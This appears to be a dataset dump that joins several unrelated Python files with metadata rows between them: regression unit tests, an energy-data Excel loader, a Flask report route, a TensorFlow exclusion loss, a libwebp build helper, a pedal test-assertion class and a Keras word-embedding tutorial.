self.X_train, self.y_train)
score = result.score(self.X_test, self.y_test)
class TestAutoEncoderRegression(unittest.TestCase):
def setUp(self):
X, y = ds.EDM().get_numpy()
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
X, y, test_size=0.1)
self.selectors = ['linear', 'kneighbors',
'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
def test_correct_assignment(self):
for selector in self.selectors:
regressor = AutoEncoderRegression(selector)
self.assertEqual(
regressor.regressor._estimator_type, 'regressor')
self.assertRaises(ValueError, SingleTargetMethod,
'nonexistent_selector')
self.assertEqual(AutoEncoderRegression(
custom_regressor=RidgeCV()).regressor._estimator_type, 'regressor')
def test_false_assignment(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
with self.assertRaises(Warning):
AutoEncoderRegression(custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(
"selector", custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(valid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(invalid_estimator)
def test_fit(self):
for selector in self.selectors:
regressor = AutoEncoderRegression(selector)
self.assertEqual(regressor.fit(
self.X_train, self.y_train).regressor._estimator_type, 'regressor')
def test_predict(self):
for selector in self.selectors:
result = AutoEncoderRegression(regressor=selector, patience=1, batch_size=10).fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_custom_regressor(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
reg = AutoEncoderRegression(custom_regressor=valid_estimator)
self.assertFalse(_implements_SciKitLearn_API(
invalid_estimator))
self.assertTrue(_implements_SciKitLearn_API(
valid_estimator))
result = reg.fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_score(self):
for selector in self.selectors:
result = AutoEncoderRegression(selector).fit(
self.X_train, self.y_train)
score = result.score(self.X_test, self.y_test)
| import unittest
from amorf.problemTransformation import AutoEncoderRegression, SingleTargetMethod, _implements_SciKitLearn_API
import amorf.datasets as ds
from sklearn.model_selection import train_test_split
from sklearn.linear_model import RidgeCV
import numpy
class TestSingleTargetMethod(unittest.TestCase):
def setUp(self):
X, y = ds.EDM().get_numpy()
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
X, y, test_size=0.1)
self.selectors = ['linear', 'kneighbors',
'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
def test_correct_assignment(self):
for selector in self.selectors:
regressor = SingleTargetMethod(selector)
self.assertEqual(
regressor.MORegressor._estimator_type, 'regressor')
self.assertRaises(ValueError, SingleTargetMethod,
'nonexistent_selector')
self.assertEqual(SingleTargetMethod(
custom_regressor=RidgeCV()).MORegressor._estimator_type, 'regressor')
def test_false_assignment(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
with self.assertRaises(Warning):
SingleTargetMethod(custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod("selector", custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod(valid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod(invalid_estimator)
def test_fit(self):
for selector in self.selectors:
regressor = SingleTargetMethod(selector)
self.assertEqual(regressor.fit(
self.X_train, self.y_train)._estimator_type, 'regressor')
def test_predict(self):
for selector in self.selectors:
result = SingleTargetMethod(selector).fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_custom_regressor(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
stm = SingleTargetMethod(custom_regressor=valid_estimator)
self.assertFalse(_implements_SciKitLearn_API(
invalid_estimator))
self.assertTrue(_implements_SciKitLearn_API(
valid_estimator))
result = stm.fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_score(self):
for selector in self.selectors:
result = SingleTargetMethod(selector).fit(
self.X_train, self.y_train)
score = result.score(self.X_test, self.y_test)
class TestAutoEncoderRegression(unittest.TestCase):
def setUp(self):
X, y = ds.EDM().get_numpy()
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
X, y, test_size=0.1)
self.selectors = ['linear', 'kneighbors',
'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
def test_correct_assignment(self):
for selector in self.selectors:
regressor = AutoEncoderRegression(selector)
self.assertEqual(
regressor.regressor._estimator_type, 'regressor')
self.assertRaises(ValueError, SingleTargetMethod,
'nonexistent_selector')
self.assertEqual(AutoEncoderRegression(
custom_regressor=RidgeCV()).regressor._estimator_type, 'regressor')
def test_false_assignment(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
with self.assertRaises(Warning):
AutoEncoderRegression(custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(
"selector", custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(valid_estimator)
with self.assertRaises(ValueError):
AutoEncoderRegression(invalid_estimator)
def test_fit(self):
for selector in self.selectors:
regressor = AutoEncoderRegression(selector)
self.assertEqual(regressor.fit(
self.X_train, self.y_train).regressor._estimator_type, 'regressor')
def test_predict(self):
for selector in self.selectors:
result = AutoEncoderRegression(regressor=selector, patience=1, batch_size=10).fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_custom_regressor(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
reg = AutoEncoderRegression(custom_regressor=valid_estimator)
self.assertFalse(_implements_SciKitLearn_API(
invalid_estimator))
self.assertTrue(_implements_SciKitLearn_API(
valid_estimator))
result = reg.fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_score(self):
for selector in self.selectors:
result = AutoEncoderRegression(selector).fit(
self.X_train, self.y_train)
score = result.score(self.X_test, self.y_test) | none | 1 | 2.763128 | 3 | |
src/scenario_builder/data.py | reegis/scenario_builder | 2 | 6612389 | <filename>src/scenario_builder/data.py
# -*- coding: utf-8 -*-
"""General data processing for general non-reegis data.
SPDX-FileCopyrightText: 2016-2021 <NAME> <<EMAIL>>
SPDX-License-Identifier: MIT
"""
__copyright__ = "<NAME> <<EMAIL>>"
__license__ = "MIT"
import os
from types import SimpleNamespace
import pandas as pd
from reegis import config as cfg
from reegis import tools
TRANSLATION_FUEL = {
"Abfall": "waste",
"Kernenergie": "nuclear",
"Braunkohle": "lignite",
"Steinkohle": "hard coal",
"Erdgas": "natural gas",
"GuD": "natural gas",
"Gasturbine": "natural gas",
"Öl": "oil",
"Sonstige": "other",
"Emissionszertifikatspreis": "co2_price",
}
def get_ewi_data():
"""
Returns
-------
namedtuple
TODO: Keep this in deflex???
Examples
--------
# >>> ewi_data = get_ewi_data()
# >>> round(ewi_data.fuel_costs.loc["hard coal", "value"], 2)
# 11.28
"""
# Download file
url = (
"https://www.ewi.uni-koeln.de/cms/wp-content/uploads/2019/12"
"/EWI_Merit_Order_Tool_2019_1_4.xlsm"
)
fn = os.path.join(cfg.get("paths", "general"), "ewi.xls")
tools.download_file(fn, url)
# Create named tuple with all sub tables
ewi_tables = {
"fuel_costs": {"skiprows": 7, "usecols": "C:F", "nrows": 7},
"transport_costs": {"skiprows": 21, "usecols": "C:F", "nrows": 7},
"variable_costs": {"skiprows": 31, "usecols": "C:F", "nrows": 8},
"downtime_factor": {
"skiprows": 31,
"usecols": "H:K",
"nrows": 8,
"scale": 0.01,
},
"emission": {"skiprows": 31, "usecols": "M:P", "nrows": 7},
"co2_price": {"skiprows": 17, "usecols": "C:F", "nrows": 1},
}
ewi_data = {}
cols = ["fuel", "value", "unit", "source"]
xls = pd.ExcelFile(fn)
for table in ewi_tables.keys():
tmp = xls.parse("Start", header=[0], **ewi_tables[table]).replace(
TRANSLATION_FUEL
)
tmp.drop_duplicates(tmp.columns[0], keep="first", inplace=True)
tmp.columns = cols
ewi_data[table] = tmp.set_index("fuel")
if "scale" in ewi_tables[table]:
ewi_data[table]["value"] *= ewi_tables[table]["scale"]
return SimpleNamespace(**ewi_data)
| <filename>src/scenario_builder/data.py
# -*- coding: utf-8 -*-
"""General data processing for general non-reegis data.
SPDX-FileCopyrightText: 2016-2021 <NAME> <<EMAIL>>
SPDX-License-Identifier: MIT
"""
__copyright__ = "<NAME> <<EMAIL>>"
__license__ = "MIT"
import os
from types import SimpleNamespace
import pandas as pd
from reegis import config as cfg
from reegis import tools
TRANSLATION_FUEL = {
"Abfall": "waste",
"Kernenergie": "nuclear",
"Braunkohle": "lignite",
"Steinkohle": "hard coal",
"Erdgas": "natural gas",
"GuD": "natural gas",
"Gasturbine": "natural gas",
"Öl": "oil",
"Sonstige": "other",
"Emissionszertifikatspreis": "co2_price",
}
def get_ewi_data():
"""
Returns
-------
namedtuple
TODO: Keep this in deflex???
Examples
--------
# >>> ewi_data = get_ewi_data()
# >>> round(ewi_data.fuel_costs.loc["hard coal", "value"], 2)
# 11.28
"""
# Download file
url = (
"https://www.ewi.uni-koeln.de/cms/wp-content/uploads/2019/12"
"/EWI_Merit_Order_Tool_2019_1_4.xlsm"
)
fn = os.path.join(cfg.get("paths", "general"), "ewi.xls")
tools.download_file(fn, url)
# Create named tuple with all sub tables
ewi_tables = {
"fuel_costs": {"skiprows": 7, "usecols": "C:F", "nrows": 7},
"transport_costs": {"skiprows": 21, "usecols": "C:F", "nrows": 7},
"variable_costs": {"skiprows": 31, "usecols": "C:F", "nrows": 8},
"downtime_factor": {
"skiprows": 31,
"usecols": "H:K",
"nrows": 8,
"scale": 0.01,
},
"emission": {"skiprows": 31, "usecols": "M:P", "nrows": 7},
"co2_price": {"skiprows": 17, "usecols": "C:F", "nrows": 1},
}
ewi_data = {}
cols = ["fuel", "value", "unit", "source"]
xls = pd.ExcelFile(fn)
for table in ewi_tables.keys():
tmp = xls.parse("Start", header=[0], **ewi_tables[table]).replace(
TRANSLATION_FUEL
)
tmp.drop_duplicates(tmp.columns[0], keep="first", inplace=True)
tmp.columns = cols
ewi_data[table] = tmp.set_index("fuel")
if "scale" in ewi_tables[table]:
ewi_data[table]["value"] *= ewi_tables[table]["scale"]
return SimpleNamespace(**ewi_data)
| en | 0.453777 | # -*- coding: utf-8 -*- General data processing for general non-reegis data. SPDX-FileCopyrightText: 2016-2021 <NAME> <<EMAIL>> SPDX-License-Identifier: MIT Returns ------- namedtuple TODO: Keep this in deflex??? Examples -------- # >>> ewi_data = get_ewi_data() # >>> round(ewi_data.fuel_costs.loc["hard coal", "value"], 2) # 11.28 # Download file # Create named tuple with all sub tables | 2.035671 | 2 |
application/reports/views.py | riihikallio/tsoha | 0 | 6612390 | <reponame>riihikallio/tsoha
from flask import render_template
from flask_login import login_required
from application import app
from application.reports.models import sales_by_category, sales_by_customer
@app.route("/reports/", methods=["GET"])
@login_required
def reports():
return render_template("reports/show.html", cat=sales_by_category(), cust=sales_by_customer())
| from flask import render_template
from flask_login import login_required
from application import app
from application.reports.models import sales_by_category, sales_by_customer
@app.route("/reports/", methods=["GET"])
@login_required
def reports():
return render_template("reports/show.html", cat=sales_by_category(), cust=sales_by_customer()) | none | 1 | 2.056988 | 2 | |
segme/loss/fb_exclusion.py | shkarupa-alex/segme | 2 | 6612391 | <gh_stars>1-10
import tensorflow as tf
from keras.utils.generic_utils import register_keras_serializable
from keras.utils.losses_utils import ReductionV2 as Reduction
from .weighted_wrapper import WeightedLossFunctionWrapper
@register_keras_serializable(package='SegMe')
class ForegroundBackgroundExclusionLoss(WeightedLossFunctionWrapper):
""" Proposed in: 'Single Image Reflection Removal with Perceptual Losses'
Implements Equation [5] in https://arxiv.org/pdf/1806.05376.pdf
"""
def __init__(
self, levels=3, reduction=Reduction.AUTO, name='foreground_background_exclusion_loss'):
super().__init__(foreground_background_exclusion_loss, reduction=reduction, name=name, levels=levels)
def _foreground_background_exclusion_level(f_pred, b_pred, axis, sample_weight):
grad_w = None
if 1 == axis:
grad_f = f_pred[:, 1:, :, :] - f_pred[:, :-1, :, :]
grad_b = b_pred[:, 1:, :, :] - b_pred[:, :-1, :, :]
if sample_weight is not None:
grad_w = tf.reduce_min(tf.concat([
sample_weight[:, 1:, :, :], sample_weight[:, :-1, :, :]
], axis=-1), axis=-1, keepdims=True)
elif 2 == axis:
grad_f = f_pred[:, :, 1:, :] - f_pred[:, :, :-1, :]
grad_b = b_pred[:, :, 1:, :] - b_pred[:, :, :-1, :]
if sample_weight is not None:
grad_w = tf.reduce_min(tf.concat([
sample_weight[:, :, 1:, :], sample_weight[:, :, :-1, :]
], axis=-1), axis=-1, keepdims=True)
else:
raise ValueError('Unsupported axis: {}'.format(axis))
axis_hwc = list(range(1, f_pred.shape.ndims))
alpha = 2. * tf.math.divide_no_nan(
tf.reduce_mean(tf.abs(grad_f), axis=axis_hwc, keepdims=True),
tf.reduce_mean(tf.abs(grad_b), axis=axis_hwc, keepdims=True))
grad_fs = tf.nn.sigmoid(grad_f) * 2. - 1.
grad_bs = tf.nn.sigmoid(grad_b * alpha) * 2. - 1.
loss = tf.multiply(grad_fs ** 2, grad_bs ** 2)
if grad_w is not None:
loss *= grad_w
loss = tf.reduce_mean(loss, axis=axis_hwc) ** 0.25
return loss
def foreground_background_exclusion_loss(f_pred, b_pred, sample_weight, levels):
assert_f_rank = tf.assert_rank(f_pred, 4)
assert_b_rank = tf.assert_rank(b_pred, 4)
with tf.control_dependencies([assert_f_rank, assert_b_rank]):
f_pred = tf.convert_to_tensor(f_pred)
b_pred = tf.cast(b_pred, dtype=f_pred.dtype)
loss = []
for level in range(levels):
if level > 0:
f_pred = tf.nn.avg_pool(f_pred, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
b_pred = tf.nn.avg_pool(b_pred, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
if sample_weight is not None:
sample_weight = tf.nn.avg_pool(sample_weight, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
loss.append(_foreground_background_exclusion_level(f_pred, b_pred, axis=1, sample_weight=sample_weight))
loss.append(_foreground_background_exclusion_level(f_pred, b_pred, axis=2, sample_weight=sample_weight))
loss = sum(loss) / (2. * levels)
return loss
| import tensorflow as tf
from keras.utils.generic_utils import register_keras_serializable
from keras.utils.losses_utils import ReductionV2 as Reduction
from .weighted_wrapper import WeightedLossFunctionWrapper
@register_keras_serializable(package='SegMe')
class ForegroundBackgroundExclusionLoss(WeightedLossFunctionWrapper):
""" Proposed in: 'Single Image Reflection Removal with Perceptual Losses'
Implements Equation [5] in https://arxiv.org/pdf/1806.05376.pdf
"""
def __init__(
self, levels=3, reduction=Reduction.AUTO, name='foreground_background_exclusion_loss'):
super().__init__(foreground_background_exclusion_loss, reduction=reduction, name=name, levels=levels)
def _foreground_background_exclusion_level(f_pred, b_pred, axis, sample_weight):
grad_w = None
if 1 == axis:
grad_f = f_pred[:, 1:, :, :] - f_pred[:, :-1, :, :]
grad_b = b_pred[:, 1:, :, :] - b_pred[:, :-1, :, :]
if sample_weight is not None:
grad_w = tf.reduce_min(tf.concat([
sample_weight[:, 1:, :, :], sample_weight[:, :-1, :, :]
], axis=-1), axis=-1, keepdims=True)
elif 2 == axis:
grad_f = f_pred[:, :, 1:, :] - f_pred[:, :, :-1, :]
grad_b = b_pred[:, :, 1:, :] - b_pred[:, :, :-1, :]
if sample_weight is not None:
grad_w = tf.reduce_min(tf.concat([
sample_weight[:, :, 1:, :], sample_weight[:, :, :-1, :]
], axis=-1), axis=-1, keepdims=True)
else:
raise ValueError('Unsupported axis: {}'.format(axis))
axis_hwc = list(range(1, f_pred.shape.ndims))
alpha = 2. * tf.math.divide_no_nan(
tf.reduce_mean(tf.abs(grad_f), axis=axis_hwc, keepdims=True),
tf.reduce_mean(tf.abs(grad_b), axis=axis_hwc, keepdims=True))
grad_fs = tf.nn.sigmoid(grad_f) * 2. - 1.
grad_bs = tf.nn.sigmoid(grad_b * alpha) * 2. - 1.
loss = tf.multiply(grad_fs ** 2, grad_bs ** 2)
if grad_w is not None:
loss *= grad_w
loss = tf.reduce_mean(loss, axis=axis_hwc) ** 0.25
return loss
def foreground_background_exclusion_loss(f_pred, b_pred, sample_weight, levels):
assert_f_rank = tf.assert_rank(f_pred, 4)
assert_b_rank = tf.assert_rank(b_pred, 4)
with tf.control_dependencies([assert_f_rank, assert_b_rank]):
f_pred = tf.convert_to_tensor(f_pred)
b_pred = tf.cast(b_pred, dtype=f_pred.dtype)
loss = []
for level in range(levels):
if level > 0:
f_pred = tf.nn.avg_pool(f_pred, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
b_pred = tf.nn.avg_pool(b_pred, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
if sample_weight is not None:
sample_weight = tf.nn.avg_pool(sample_weight, [1, 2, 2, 1], [1, 2, 2, 1], padding='SAME')
loss.append(_foreground_background_exclusion_level(f_pred, b_pred, axis=1, sample_weight=sample_weight))
loss.append(_foreground_background_exclusion_level(f_pred, b_pred, axis=2, sample_weight=sample_weight))
loss = sum(loss) / (2. * levels)
return loss | en | 0.746804 | Proposed in: 'Single Image Reflection Removal with Perceptual Losses' Implements Equation [5] in https://arxiv.org/pdf/1806.05376.pdf | 2.104078 | 2 |
builder/build_libwebp/__init__.py | kdschlosser/wxAnimation | 2 | 6612392 | <filename>builder/build_libwebp/__init__.py
# -*- coding: utf-8 -*-
import os
from .. import build_clib
from ..dep_versions import WEBP_VERSION
from setuptools import Extension as _Extension
URL = 'https://storage.googleapis.com/downloads.webmproject.org/releases/webp'
DOWNLOAD_URL = URL + '/libwebp-{0}.tar.gz'
VERSION = WEBP_VERSION
# I know this seems kind of odd... I am doing a tiny bit of voodoo magic code here
# I need the class name in order to set up the directories
# and i use the __module__ attribute of the class in order to get this module instance
# from sys.modules. I use that module instance to grab the 3 constants in this file.
class build_libwebp(build_clib.build_clib):
pass
class WebpExtension(_Extension):
def __init__(self, *args, **kwargs):
_Extension.__init__(self, *args, **kwargs)
self.name = '_libwebp'
self.sources = [os.path.join(os.path.dirname(__file__), 'extension.c')]
self.header = os.path.join(os.path.dirname(__file__), 'extension.h')
self.extra_objects = ['webpmux.lib', 'webpdemux.lib', 'webpdecoder.lib', 'webp.lib']
self.include_dirs = [
'webp/src/dec',
'webp/src/demux',
'webp/src/dsp',
'webp/src/enc',
'webp/src/mux',
'webp/src/utils',
'webp/src/webp'
]
self.libraries = []
| <filename>builder/build_libwebp/__init__.py
# -*- coding: utf-8 -*-
import os
from .. import build_clib
from ..dep_versions import WEBP_VERSION
from setuptools import Extension as _Extension
URL = 'https://storage.googleapis.com/downloads.webmproject.org/releases/webp'
DOWNLOAD_URL = URL + '/libwebp-{0}.tar.gz'
VERSION = WEBP_VERSION
# I know this seems kind of odd... I am doing a tiny bit of voodoo magic code here
# I need the class name in order to set up the directories
# and i use the __module__ attribute of the class in order to get this module instance
# from sys.modules. I use that module instance to grab the 3 constants in this file.
class build_libwebp(build_clib.build_clib):
pass
class WebpExtension(_Extension):
def __init__(self, *args, **kwargs):
_Extension.__init__(self, *args, **kwargs)
self.name = '_libwebp'
self.sources = [os.path.join(os.path.dirname(__file__), 'extension.c')]
self.header = os.path.join(os.path.dirname(__file__), 'extension.h')
self.extra_objects = ['webpmux.lib', 'webpdemux.lib', 'webpdecoder.lib', 'webp.lib']
self.include_dirs = [
'webp/src/dec',
'webp/src/demux',
'webp/src/dsp',
'webp/src/enc',
'webp/src/mux',
'webp/src/utils',
'webp/src/webp'
]
self.libraries = []
| en | 0.817314 | # -*- coding: utf-8 -*- # I know this seems kind of odd... I am doing a tiny bit of voodoo magic code here # I need the class name in order to set up the directories # and i use the __module__ attribute of the class in order to get this module instance # from sys.modules. I use that module instance to grab the 3 constants in this file. | 2.028575 | 2 |
src/lib/pedal/plugins/vpl_unittest.py | Skydler/skulpt | 4 | 6612393 | <reponame>Skydler/skulpt<filename>src/lib/pedal/plugins/vpl_unittest.py<gh_stars>1-10
from unittest.util import safe_repr
from pedal import gently
from pedal.assertions.assertions import _normalize_string
class UnitTestedAssignment:
DELTA = .001
class AssertionException(Exception):
def __init__(self, message):
self.message = message
def __init__(self):
pass
def setUp(self):
pass
def tearDown(self):
pass
def _run_all_tests(self):
methods = [func for func in dir(self)
if callable(getattr(self, func)) and
func.startswith('test_')]
all_passed = True
for method in methods:
self.setUp()
try:
getattr(self, method)()
except UnitTestedAssignment.AssertionException as e:
gently(e.message)
all_passed = False
self.tearDown()
return all_passed
def assertSimilarStrings(self, first, second, msg):
if _normalize_string(first) != _normalize_string(second):
return self.assertEqual(first, second, msg, exact=True)
def assertNotSimilarStrings(self, first, second, msg):
if _normalize_string(first) == _normalize_string(second):
return self.assertEqual(first, second, msg, exact=True)
def assertLessEqual(self, val1, val2, msg=None):
if not (val1 <= val2):
self.fail(msg, "{} is not less than or equal to {}".format(safe_repr(val1), safe_repr(val2)))
def assertGreaterEqual(self, val1, val2, msg=None):
if not (val1 >= val2):
self.fail(msg, "{} is not greater than or equal to {}".format(safe_repr(val1), safe_repr(val2)))
def assertNotEqual(self, val1, val2, msg=None, exact=False):
if val1 != val2:
return
if not exact and isinstance(val1, str) and isinstance(val2, str):
self.assertNotSimilarStrings(val1, val2, msg)
elif (not exact and isinstance(val1, (int, float)) and
isinstance(val2, (int, float))):
if abs(val2 - val1) > UnitTestedAssignment.DELTA:
return
standardMsg = "{} == {}".format(safe_repr(val1), safe_repr(val2))
self.fail(msg, standardMsg)
def assertEqual(self, val1, val2, msg=None, exact=False):
if val1 == val2:
return
if not exact and isinstance(val1, str) and isinstance(val2, str):
self.assertSimilarStrings(val1, val2, msg)
elif (not exact and isinstance(val1, (int, float)) and
isinstance(val2, (int, float))):
if abs(val2 - val1) <= UnitTestedAssignment.DELTA:
return
standardMsg = "{} != {}".format(safe_repr(val1), safe_repr(val2))
self.fail(msg, standardMsg)
def assertIn(self, member, container, msg=None):
if member not in container:
standardMsg = "{} not found in {}".format(safe_repr(member),
safe_repr(container))
self.fail(msg, standardMsg)
def assertNotIn(self, member, container, msg=None):
if member in container:
standardMsg = "{} found in {}".format(safe_repr(member),
safe_repr(container))
self.fail(msg, standardMsg)
def assertTrue(self, value, msg=None):
if not value:
self.fail(msg, "{} is not true".format(value))
def assertFalse(self, value, msg=None):
if value:
self.fail(msg, "{} is not false".format(value))
def assertSandbox(self, sandbox, msg=None):
if sandbox.exception is not None:
self.fail(msg, sandbox.format_exception())
def assertIsInstance(self, value, parent, msg=None):
if not isinstance(value, parent):
self.fail(msg, "{} is not an instance of {}".format(safe_repr(value), safe_repr(parent)))
def assertHasAttr(self, object, attr, msg=None):
if not hasattr(object, attr):
self.fail(msg, "{} does not have an attribute named {}".format(safe_repr(object), safe_repr(attr)))
def fail(self, message, standardMsg):
if message is None:
message = standardMsg
raise UnitTestedAssignment.AssertionException(message)
| from unittest.util import safe_repr
from pedal import gently
from pedal.assertions.assertions import _normalize_string
class UnitTestedAssignment:
DELTA = .001
class AssertionException(Exception):
def __init__(self, message):
self.message = message
def __init__(self):
pass
def setUp(self):
pass
def tearDown(self):
pass
def _run_all_tests(self):
methods = [func for func in dir(self)
if callable(getattr(self, func)) and
func.startswith('test_')]
all_passed = True
for method in methods:
self.setUp()
try:
getattr(self, method)()
except UnitTestedAssignment.AssertionException as e:
gently(e.message)
all_passed = False
self.tearDown()
return all_passed
def assertSimilarStrings(self, first, second, msg):
if _normalize_string(first) != _normalize_string(second):
return self.assertEqual(first, second, msg, exact=True)
def assertNotSimilarStrings(self, first, second, msg):
if _normalize_string(first) == _normalize_string(second):
return self.assertEqual(first, second, msg, exact=True)
def assertLessEqual(self, val1, val2, msg=None):
if not (val1 <= val2):
self.fail(msg, "{} is not less than or equal to {}".format(safe_repr(val1), safe_repr(val2)))
def assertGreaterEqual(self, val1, val2, msg=None):
if not (val1 >= val2):
self.fail(msg, "{} is not greater than or equal to {}".format(safe_repr(val1), safe_repr(val2)))
def assertNotEqual(self, val1, val2, msg=None, exact=False):
if val1 != val2:
return
if not exact and isinstance(val1, str) and isinstance(val2, str):
self.assertNotSimilarStrings(val1, val2, msg)
elif (not exact and isinstance(val1, (int, float)) and
isinstance(val2, (int, float))):
if abs(val2 - val1) > UnitTestedAssignment.DELTA:
return
standardMsg = "{} == {}".format(safe_repr(val1), safe_repr(val2))
self.fail(msg, standardMsg)
def assertEqual(self, val1, val2, msg=None, exact=False):
if val1 == val2:
return
if not exact and isinstance(val1, str) and isinstance(val2, str):
self.assertSimilarStrings(val1, val2, msg)
elif (not exact and isinstance(val1, (int, float)) and
isinstance(val2, (int, float))):
if abs(val2 - val1) <= UnitTestedAssignment.DELTA:
return
standardMsg = "{} != {}".format(safe_repr(val1), safe_repr(val2))
self.fail(msg, standardMsg)
def assertIn(self, member, container, msg=None):
if member not in container:
standardMsg = "{} not found in {}".format(safe_repr(member),
safe_repr(container))
self.fail(msg, standardMsg)
def assertNotIn(self, member, container, msg=None):
if member in container:
standardMsg = "{} found in {}".format(safe_repr(member),
safe_repr(container))
self.fail(msg, standardMsg)
def assertTrue(self, value, msg=None):
if not value:
self.fail(msg, "{} is not true".format(value))
def assertFalse(self, value, msg=None):
if value:
self.fail(msg, "{} is not false".format(value))
def assertSandbox(self, sandbox, msg=None):
if sandbox.exception is not None:
self.fail(msg, sandbox.format_exception())
def assertIsInstance(self, value, parent, msg=None):
if not isinstance(value, parent):
self.fail(msg, "{} is not an instance of {}".format(safe_repr(value), safe_repr(parent)))
def assertHasAttr(self, object, attr, msg=None):
if not hasattr(object, attr):
self.fail(msg, "{} does not have an attribute named {}".format(safe_repr(object), safe_repr(attr)))
def fail(self, message, standardMsg):
if message is None:
message = standardMsg
raise UnitTestedAssignment.AssertionException(message) | none | 1 | 2.932735 | 3 | |
lec6-2[w2v].py | cutz-j/keras | 0 | 6612394 | ### w2v ###
import numpy as np
from keras.datasets import imdb
from keras import preprocessing
from keras.models import Sequential
from keras.layers import Flatten, Dense, Embedding
import os
from keras.preprocessing.text import Tokenizer # token
from keras.preprocessing.sequence import pad_sequences # array화
import tensorflow as tf
max_features = 1000 # 빈번단어 1000개
maxlen = 20 # 사용 텍스트 길이?
# data download #
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features) # 영화 리뷰 데이터 --> word index array
# 20차원으로 축소 #
x_train = preprocessing.sequence.pad_sequences(x_train, maxlen=maxlen) # shape=(25000,20)
x_test = preprocessing.sequence.pad_sequences(x_test, maxlen=maxlen) # (25000, 20)
## embedding layer ##
model = Sequential()
model.add(Embedding(input_dim=10000, output_dim=8, input_length=maxlen))
model.add(Flatten())
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
model.summary()
history = model.fit(x_train, y_train,
epochs=10, batch_size=32, validation_split=0.2)
model.summary()
### pretrained embedding model ###
imdb_dir = 'd:/data/datasets/aclImdb'
train_dir = os.path.join(imdb_dir, 'train')
labels = [] # 25000 label(pos / neg)
texts = [] # 25000 (sentences)
## label 마다 load ##
for label_type in ['neg', 'pos']:
dir_name = os.path.join(train_dir, label_type)
for fname in os.listdir(dir_name):
if fname[-4:] == '.txt':
f = open(os.path.join(dir_name, fname), encoding="utf-8")
texts.append(f.read())
f.close()
if label_type == 'neg':
labels.append(0)
else:
labels.append(1)
maxlen = 100 # 단어개수최대
training_samples = 15000
validation_samples = 10000
max_words = 10000 # dataset에서 사용할 단어개수
tokenizer = Tokenizer(num_words=max_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
data = pad_sequences(sequences, maxlen=maxlen)
labels = np.asarray(labels)
np.random.seed(7)
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
x_train = data[:training_samples]
y_train = labels[:training_samples]
x_val = data[training_samples: training_samples + validation_samples]
y_val = labels[training_samples: training_samples + validation_samples]
## pretrained: Glove ##
glove_dir = 'd:/data/datasets/'
embeddings_index = {}
f = open(os.path.join(glove_dir, 'glove.6B.100d.txt'), encoding='utf8')
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
# embedding matrix #
embedding_dim = 100
embedding_matrix = np.zeros((max_words, embedding_dim))
for word, i in word_index.items():
if i < max_words:
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
model = Sequential()
model.add(Embedding(max_words, embedding_dim, input_length=maxlen))
model.add(Flatten())
model.add(Dense(32, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.summary()
# weight set #
model.layers[0].set_weights([embedding_matrix])
model.layers[0].trainable = False
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
